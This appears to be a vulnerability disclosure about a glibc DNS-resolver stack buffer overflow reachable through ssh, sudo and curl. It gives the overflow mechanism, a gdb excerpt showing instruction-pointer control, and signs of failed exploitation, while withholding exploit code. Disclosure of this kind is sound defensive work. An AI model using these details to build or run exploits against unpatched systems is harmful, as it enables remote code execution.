glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.

Exploitation:

Remote code execution is possible, but not straightforward. It requires bypassing the security mitigations present on the system, such as ASLR. We will not release our exploit code, but a non-weaponized Proof of Concept has been made available simultaneously with this blog post. With this Proof of Concept, you can verify if you are affected by this issue, and verify any mitigations you may wish to enact. As you can see in the below debugging session we are able to reliably control EIP/RIP.

(gdb) x/i $rip
=> 0x7fe156f0ccce <_nss_dns_gethostbyname4_r+398>: req
(gdb) x/a $rsp
0x7fff56fd8a48: 0x4242424242424242 0x4242424242420042

When code crashes unexpectedly, it can be a sign of something much more significant than it appears; ignore crashes at your peril! Failed exploit indicators, due to ASLR, can include:

  • Crash on free(ptr) where ptr is controlled by the attacker.
  • Crash on free(ptr) where ptr is semi-controlled by the attacker since ptr has to be a valid readable address.
  • Crash reading from memory pointed to by an overwritten local variable.
  • Crash writing to memory on an attacker-controlled pointer.

We would like to thank Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O’Donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.


Credit:  Fermin J. Serna and Kevin Stadmeyer